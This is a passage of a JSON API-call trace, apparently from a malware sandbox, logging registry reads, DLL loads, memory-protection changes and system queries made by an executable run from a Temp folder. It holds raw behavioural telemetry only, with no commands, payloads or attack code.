"value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" }, { "name": "Handle", "value": "0x00000258" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" } ], "repeated": 0, "id": 512 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0041ec23", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" }, { "name": "ValueName", "value": "MS Shell Dlg 2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Shell Dlg 2" } ], "repeated": 0, "id": 513 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0041ed0c", "parentcaller": "0x0041eca1", "category": "registry", "api": "RegQueryValueExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" }, { "name": "ValueName", "value": "MS Shell Dlg 2" }, { "name": "Data", "value": "Tahoma" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Shell Dlg 2" } ], "repeated": 0, "id": 514 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0041e9bf", "parentcaller": "0x0048f314", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" } ], "repeated": 0, "id": 515 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0041e282", "parentcaller": "0x00404b23", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "USER32.DLL" }, { "name": "ModuleHandle", "value": "0x76610000" } ], "repeated": 0, "id": 516 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x00452a09", "parentcaller": "0x0048f604", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "Delphi00001D20" }, { "name": "Atom", "value": "0x0000c0a8" } ], "repeated": 0, "id": 517 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x00452a5a", "parentcaller": "0x0048f604", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ControlOfs0040000000001DD0" }, { "name": "Atom", "value": "0x0000c087" } ], "repeated": 0, "id": 518 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0041dc24", "parentcaller": "0x0041dbfa", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetMonitorInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76634cc0" } ], "repeated": 0, "id": 519 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0041dc24", "parentcaller": "0x0041dca6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetSystemMetrics" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645390" } ], "repeated": 0, "id": 520 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004524df", "parentcaller": "0x0048f604", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000068" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 521 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 522 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 523 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 524 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 525 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 526 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 527 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 528 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 529 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 530 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fdd1", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 531 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0045fa1e", "parentcaller": "0x00452aaa", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x040a0c0a", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 532 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0041dc24", "parentcaller": "0x0041e172", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "EnumDisplayMonitors" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766520a0" } ], "repeated": 0, "id": 533 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x00460262", "parentcaller": "0x0045fadc", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x0000001f" }, { "name": "uiParam", "value": "0x0000003c" } ], "repeated": 0, "id": 534 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0046026f", "parentcaller": "0x0045fadc", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 535 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x0046026f", "parentcaller": "0x0045fadc", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 536 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004602ae", "parentcaller": "0x0045fadc", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000029" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 537 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000264" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "MSCTF.dll" } ], "repeated": 0, "id": 538 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000264" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75650000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x000d4000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 539 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 540 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 541 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 542 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75714000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 543 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000264" } ], "repeated": 0, "id": 544 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75714000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 545 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\n\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00o\\x00r\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00n\\x003\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00u\\x00l\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00r\\x00-\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00-\\x000\\x00" } ], "repeated": 0, "id": 546 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\MSCTF" }, { "name": "DllBase", "value": "0x75650000" } ], "repeated": 0, "id": 547 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\msctf" }, { "name": "BaseAddress", "value": "0x75650000" }, { "name": "InitRoutine", "value": "0x7569e400" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 548 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 549 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 550 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000270" } ], "repeated": 0, "id": 551 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000274" } ], "repeated": 0, "id": 552 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 553 }, { "timestamp": "2025-03-02 21:32:33,295", "thread_id": "7632", "caller": "0x004077a0", "parentcaller": "0x0041c723", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 554 }, { "timestamp": "2025-03-02 21:32:33,389", "thread_id": "7632", "caller": "0x0041c603", "parentcaller": "0x0041c737", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a590000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 555 }, { "timestamp": "2025-03-02 21:32:33,389", "thread_id": "7632", "caller": "0x00461055", "parentcaller": "0x00460e19", "category": "misc", "api": "GetSystemMetrics", "status": true, "return": "0x00000400", "arguments": [ { "name": "SystemMetricIndex", "value": "0" } ], "repeated": 0, "id": 556 }, { "timestamp": "2025-03-02 21:32:33,389", "thread_id": "7632", "caller": "0x00461068", "parentcaller": "0x00460e19", "category": "misc", "api": "GetSystemMetrics", "status": true, "return": "0x00000300", "arguments": [ { "name": "SystemMetricIndex", "value": "1" } ], "repeated": 0, "id": 557 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00461657", "parentcaller": "0x00461d6f", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "ModuleHandle", "value": "0x00400000" } ], "repeated": 1, "id": 558 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00460e19", "parentcaller": "0x00452ac0", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000274" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" } ], "repeated": 0, "id": 559 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00460e19", "parentcaller": "0x00452ac0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000274" }, { "name": "ValueName", "value": "Latest" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest" } ], "repeated": 0, "id": 560 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00460e19", "parentcaller": "0x00452ac0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000274" } ], "repeated": 0, "id": 561 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00460e19", "parentcaller": "0x00452ac0", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000274" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\USER32.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 562 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00460e19", "parentcaller": "0x00452ac0", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000270" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000274" } ], "repeated": 0, "id": 563 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00460e19", "parentcaller": "0x00452ac0", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000270" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a5a0000" }, { "name": "SectionOffset", "value": "0x0019eeb8" }, { "name": "ViewSize", "value": "0x00008000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 564 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00460e19", "parentcaller": "0x00452ac0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000270" } ], "repeated": 0, "id": 565 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00452af4", "parentcaller": "0x0048f604", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "USER32" }, { "name": "ModuleHandle", "value": "0x76610000" } ], "repeated": 0, "id": 566 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x00452b05", "parentcaller": "0x0048f604", "category": 